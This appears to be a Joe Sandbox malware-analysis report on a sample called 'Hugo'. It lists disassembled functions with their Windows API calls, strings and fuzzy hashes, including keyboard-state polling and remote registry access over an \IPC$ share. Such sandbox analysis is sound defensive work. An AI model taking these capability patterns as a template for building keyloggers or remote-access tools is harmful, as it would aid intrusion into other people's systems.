Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 0ddadbe1a33427db64640bd038d9e267f0ea3a49d7a7ce29e3842b4709827a88
Instruction ID: aff879488b83e7f0944678ffe7a3ea62dc030836a2ef9ca2c7cdba447fa08fd6
Opcode Fuzzy Hash: 0ddadbe1a33427db64640bd038d9e267f0ea3a49d7a7ce29e3842b4709827a88
Instruction Fuzzy Hash: 47219FB190024CBFEB116F30ECCDE667BA9FB4A755B048026F50A86772DB758C04BA12

Function 00F7F313 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 00F1B329: _wcslen.LIBCMT ref: 00F1B333

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00F7F374
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00F7F38A
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F7F39B
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00F7F3AD
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00F7F3BE

Strings

open , xrefs: 00F7F323
close PlayMe, xrefs: 00F7F385, 00F7F3B2
status PlayMe mode, xrefs: 00F7F36F
alias PlayMe, xrefs: 00F7F34D
play PlayMe wait, xrefs: 00F7F3A8
play PlayMe, xrefs: 00F7F3B9

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: SendString$_wcslen
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2420728520-1007645807
Opcode ID: 3e758df0dc2e8d59bd55bf0c30f49935ef79c606e0d797c2f86717272c5f5d55
Instruction ID: 6fa9d1a609810f78aca4e4f7e9aba73bf4838b662f150d858fde9a56a6dde426
Opcode Fuzzy Hash: 3e758df0dc2e8d59bd55bf0c30f49935ef79c606e0d797c2f86717272c5f5d55
Instruction Fuzzy Hash: 45110632A5026979D720B362DC1AEFF7B7CEBD2B10F44042B7401E60D0EAA09D45E5B3

Function 00F7A958 Relevance: 18.2, APIs: 12, Instructions: 188keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00F7A9D9
SetKeyboardState.USER32(?), ref: 00F7AA44
GetAsyncKeyState.USER32(000000A0), ref: 00F7AA64
GetKeyState.USER32(000000A0), ref: 00F7AA7B
GetAsyncKeyState.USER32(000000A1), ref: 00F7AAAA
GetKeyState.USER32(000000A1), ref: 00F7AABB
GetAsyncKeyState.USER32(00000011), ref: 00F7AAE7
GetKeyState.USER32(00000011), ref: 00F7AAF5
GetAsyncKeyState.USER32(00000012), ref: 00F7AB1E
GetKeyState.USER32(00000012), ref: 00F7AB2C
GetAsyncKeyState.USER32(0000005B), ref: 00F7AB55
GetKeyState.USER32(0000005B), ref: 00F7AB63

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 676a9e9a85166172eb44ab7e56b162be9cad2c09a1a63ec21d4df2269dad3c89
Instruction ID: 50501ce2acfb1f4ce6b3ad77831ba15797b11297926bb3178b887545f53ebca0
Opcode Fuzzy Hash: 676a9e9a85166172eb44ab7e56b162be9cad2c09a1a63ec21d4df2269dad3c89
Instruction Fuzzy Hash: 95510760E0478829FB35D7748850BEEBFB58F82350F0AC59BC5CA4A1C2DA649B4CD763

Function 00F7662D Relevance: 18.2, APIs: 12, Instructions: 173COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00F76649
GetWindowRect.USER32(00000000,?), ref: 00F76662
MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00F766C0
GetDlgItem.USER32(?,00000002), ref: 00F766D0
GetWindowRect.USER32(00000000,?), ref: 00F766E2
MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00F76736
GetDlgItem.USER32(?,000003E9), ref: 00F76744
GetWindowRect.USER32(00000000,?), ref: 00F76756
MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00F76798
GetDlgItem.USER32(?,000003EA), ref: 00F767AB
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00F767C1
InvalidateRect.USER32(?,00000000,00000001), ref: 00F767CE

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 9b37baf26dc86a1d58c7d976e89df28b12e26faac33bff719953f8672c2a3177
Instruction ID: f0aebb93eaad42629acb4f43388cfe1d087a01511e12cb0c08590b3394c80105
Opcode Fuzzy Hash: 9b37baf26dc86a1d58c7d976e89df28b12e26faac33bff719953f8672c2a3177
Instruction Fuzzy Hash: B75130B1E00619AFDF18CF68CD85AAEBBB5FB48314F108129F51AE7690DB70AD04DB50

Function 00F1146D Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00F11802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00F11488,?,00000000,?,?,?,?,00F1145A,00000000,?), ref: 00F11865

DestroyWindow.USER32(?), ref: 00F11521
KillTimer.USER32(00000000,?,?,?,?,00F1145A,00000000,?), ref: 00F115BB
DestroyAcceleratorTable.USER32(00000000), ref: 00F529B4
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00F1145A,00000000,?), ref: 00F529E2
ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00F1145A,00000000,?), ref: 00F529F9
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00F1145A,00000000), ref: 00F52A15
DeleteObject.GDI32(00000000), ref: 00F52A27

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 86b196e5dc064e868f9efa2aaf8bf0b5a93304505a0fcd3afa4e39f6daa155f2
Instruction ID: 70af66ab9b3e5780d7b16ba85a1962916a793efea56b006cb5c42f5465c84b07
Opcode Fuzzy Hash: 86b196e5dc064e868f9efa2aaf8bf0b5a93304505a0fcd3afa4e39f6daa155f2
Instruction Fuzzy Hash: 42619C31901719DFDB799F18D988B6A77B6FB82322F149118E6438AA71C774AC84FF40

Function 00F12128 Relevance: 18.1, APIs: 12, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 00F12234: GetWindowLongW.USER32(?,000000EB), ref: 00F12242

GetSysColor.USER32(0000000F), ref: 00F12152

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 431be6eb364e5379349dac543c8ce1a3f8a90d23b54f6b05adec3d1241b714cf
Instruction ID: 974b7d8dbaa284f805236ebce00397ade1bfed3252f1412fc79738c105b4fe4a
Opcode Fuzzy Hash: 431be6eb364e5379349dac543c8ce1a3f8a90d23b54f6b05adec3d1241b714cf
Instruction Fuzzy Hash: 8D41BF71500644BFDB249F689C88BF93779EB42371F154259FAA29B2E1C7318D92FB10

Function 00F7A05C Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,00F60D31,00000001,0000138C,00000001,00000000,00000001,?,00F8EEAE,00FE2430), ref: 00F7A091
LoadStringW.USER32(00000000,?,00F60D31,00000001), ref: 00F7A09A

Part of subcall function 00F1B329: _wcslen.LIBCMT ref: 00F1B333

GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00F60D31,00000001,0000138C,00000001,00000000,00000001,?,00F8EEAE,00FE2430,?), ref: 00F7A0BC
LoadStringW.USER32(00000000,?,00F60D31,00000001), ref: 00F7A0BF
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00F7A1E0

Strings

Error: , xrefs: 00F7A197
%s (%d) : ==> %s: %s %s, xrefs: 00F7A1C4
Line %d (File "%s"):, xrefs: 00F7A109
Line %d:, xrefs: 00F7A11A
^ ERROR, xrefs: 00F7A175

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wcslen
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 747408836-2268648507
Opcode ID: 6b6650a32936f7830ba9d1e6ffcef9a86e374a65c9d7a382e1c5b2348a114842
Instruction ID: 8ba5aa02a6cd4b144aa6d091804f58511acac2275c84565ca0c6d4c017e74890
Opcode Fuzzy Hash: 6b6650a32936f7830ba9d1e6ffcef9a86e374a65c9d7a382e1c5b2348a114842
Instruction Fuzzy Hash: D041527280021DEACB05FBE0DD86DEEB778AF54340F504065F505B6092EB795F49EB62

Function 00F70FCF Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00F18577: _wcslen.LIBCMT ref: 00F1858A

WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00F71093
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00F710AF
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00F710CB
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00F710F5
CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00F7111D
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00F71128
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00F7112D

Strings

\IPC$, xrefs: 00F71075
\CLSID, xrefs: 00F71015
SOFTWARE\Classes\, xrefs: 00F70FFF

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 323675364-22481851
Opcode ID: 5a916d7de5bc5d49d77cd3d162bf6ee12769bc5995762f2729b4c431990e88c0
Instruction ID: f5025bedf6c135f805b536c1799ddd50ca5e4679a21c8e820f3419e647e65fbf
Opcode Fuzzy Hash: 5a916d7de5bc5d49d77cd3d162bf6ee12769bc5995762f2729b4c431990e88c0
Instruction Fuzzy Hash: 2A411872C1022DEBCB11EBA4DC95DEEB778FF04750F44802AE905A21A0EB349E49EB50

Function 00FA4A34 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00FA4AD9
CreateCompatibleDC.GDI32(00000000), ref: 00FA4AE0
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00FA4AF3
SelectObject.GDI32(00000000,00000000), ref: 00FA4AFB
GetPixel.GDI32(00000000,00000000,00000000), ref: 00FA4B06
DeleteDC.GDI32(00000000), ref: 00FA4B10
GetWindowLongW.USER32(?,000000EC), ref: 00FA4B1A
SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00FA4B30
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 00FA4B3C

Strings

static, xrefs: 00FA4A71

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: 6ada1527545da3ac5c4376c0f6b4ee80a878dd3a039273d27c5e67557aaebdcc
Instruction ID: e18db6c7fdc9366dd3abef61678575f0bdb71ba7b65f0b7c907f421b86a9b3d1
Opcode Fuzzy Hash: 6ada1527545da3ac5c4376c0f6b4ee80a878dd3a039273d27c5e67557aaebdcc
Instruction Fuzzy Hash: 23316CB2500219BBDF119FA4DC08FDA3BA9FF4E364F110211FA16E61A0C775E851EBA4

Function 00F9468D Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00F946B9
CoInitialize.OLE32(00000000), ref: 00F946E7
CoUninitialize.OLE32 ref: 00F946F1
_wcslen.LIBCMT ref: 00F9478A
GetRunningObjectTable.OLE32(00000000,?), ref: 00F9480E
SetErrorMode.KERNEL32(00000001,00000029), ref: 00F94932
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00F9496B
CoGetObject.OLE32(?,00000000,00FB0B64,?), ref: 00F9498A
SetErrorMode.KERNEL32(00000000), ref: 00F9499D
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00F94A21
VariantClear.OLEAUT32(?), ref: 00F94A35

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
String ID:
API String ID: 429561992-0
Opcode ID: cf1bcb227aa03492acd4acf98b8b9a612acfb26f807db83025d98ca4de310ab4
Instruction ID: a895b6d4a01bc28b33f3a3b3d8ad5bf5011043fd2376dfb798457bb06d2c9250
Opcode Fuzzy Hash: cf1bcb227aa03492acd4acf98b8b9a612acfb26f807db83025d98ca4de310ab4
Instruction Fuzzy Hash: 00C144B1A043059FAB00DF68C884D6BB7E9FF99758F00491DF98A9B250DB30ED06DB52

Function 00F884DB Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00F88538
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00F885D4
SHGetDesktopFolder.SHELL32(?), ref: 00F885E8
CoCreateInstance.OLE32(00FB0CD4,00000000,00000001,00FD7E8C,?), ref: 00F88634
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00F886B9
CoTaskMemFree.OLE32(?,?), ref: 00F88711
SHBrowseForFolderW.SHELL32(?), ref: 00F8879C
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00F887BF
CoTaskMemFree.OLE32(00000000), ref: 00F887C6
CoTaskMemFree.OLE32(00000000), ref: 00F8881B
CoUninitialize.OLE32 ref: 00F88821

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
String ID:
API String ID: 2762341140-0
Opcode ID: 91f8f96b34d1815c3e059eaa7dc7ec1f9f7fc37e714e83f8f845c97e6efe410a
Instruction ID: 793cbfe5403ed1158ac9d9331a1660a865d698f8b6a20a793d81000b9e50d68f
Opcode Fuzzy Hash: 91f8f96b34d1815c3e059eaa7dc7ec1f9f7fc37e714e83f8f845c97e6efe410a
Instruction Fuzzy Hash: D0C12A75A00109EFCB14DFA4C884DAEBBF9FF48354B548099E81ADB261DB34ED42DB90

Function 00F70378 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00F7039F
SafeArrayAllocData.OLEAUT32(?), ref: 00F703F8
VariantInit.OLEAUT32(?), ref: 00F7040A
SafeArrayAccessData.OLEAUT32(?,?), ref: 00F7042A
VariantCopy.OLEAUT32(?,?), ref: 00F7047D
SafeArrayUnaccessData.OLEAUT32(?), ref: 00F70491
VariantClear.OLEAUT32(?), ref: 00F704A6
SafeArrayDestroyData.OLEAUT32(?), ref: 00F704B3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00F704BC
VariantClear.OLEAUT32(?), ref: 00F704CE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00F704D9

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 31f494278d2dae77ac859a51427cf9d48a7ba5b4ec9f5a3c0b42e0f8da330962
Instruction ID: fac9688bce641151d6b558a46a2be0e33a64ca7a2e0b74729c55fd77f80abcf6
Opcode Fuzzy Hash: 31f494278d2dae77ac859a51427cf9d48a7ba5b4ec9f5a3c0b42e0f8da330962
Instruction Fuzzy Hash: 77415F75E0021DEFCB10DFA4DC449EEBBB9FF48354F008069EA5AA7261CB34A945DB91

Function 00F7A635 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00F7A65D
GetAsyncKeyState.USER32(000000A0), ref: 00F7A6DE
GetKeyState.USER32(000000A0), ref: 00F7A6F9
GetAsyncKeyState.USER32(000000A1), ref: 00F7A713
GetKeyState.USER32(000000A1), ref: 00F7A728
GetAsyncKeyState.USER32(00000011), ref: 00F7A740
GetKeyState.USER32(00000011), ref: 00F7A752
GetAsyncKeyState.USER32(00000012), ref: 00F7A76A
GetKeyState.USER32(00000012), ref: 00F7A77C
GetAsyncKeyState.USER32(0000005B), ref: 00F7A794
GetKeyState.USER32(0000005B), ref: 00F7A7A6

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: a9a8220b6b8a99733c0588edc55cc1a873a416e2c0ec59462be70023aab14b94
Instruction ID: b54585e6d922913e5aff67811922a71c8a3b17c7a2294c345ea3dadbc2d57269
Opcode Fuzzy Hash: a9a8220b6b8a99733c0588edc55cc1a873a416e2c0ec59462be70023aab14b94
Instruction Fuzzy Hash: E641D874D047C96DFF39576088043ADBEB06B95324F0AC05FD5CA4A6C2EB9499C4E763

Function 00F99730 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00000000,?), ref: 00F99750

Part of subcall function 00F79805: _wcslen.LIBCMT ref: 00F79828

_wcslen.LIBCMT ref: 00F997AB
_wcslen.LIBCMT ref: 00F997F9
_wcslen.LIBCMT ref: 00F99839
_wcslen.LIBCMT ref: 00F998CB

Strings

winapi, xrefs: 00F997F3, 00F997F8
none, xrefs: 00F998C2, 00F998C7
cdecl, xrefs: 00F997A5, 00F997AA
stdcall, xrefs: 00F99833, 00F99838

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: _wcslen$BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 707087890-567219261
Opcode ID: bb338cd13a8d340487784b6f81527649edd1ed86e258e9f42020f95ace5d5c32
Instruction ID: a2ba4e8e3103fefbdf623249513b8bc212e6c2a25be111c68908f10f85edf860
Opcode Fuzzy Hash: bb338cd13a8d340487784b6f81527649edd1ed86e258e9f42020f95ace5d5c32
Instruction Fuzzy Hash: D8510332E081169BDF14DFACC9419BEB3A5BF25370B62422DE826E7280DB75DD40E790

Function 00F94189 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 00F941D1
CoUninitialize.OLE32 ref: 00F941DC
CoCreateInstance.OLE32(?,00000000,00000017,00FB0B44,?), ref: 00F94236
IIDFromString.OLE32(?,?), ref: 00F942A9
VariantInit.OLEAUT32(?), ref: 00F94341
VariantClear.OLEAUT32(?), ref: 00F94393

Strings

NULL Pointer assignment, xrefs: 00F9427B
Failed to create object, xrefs: 00F94241, 00F942F7
Invalid parameter, xrefs: 00F942C2

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

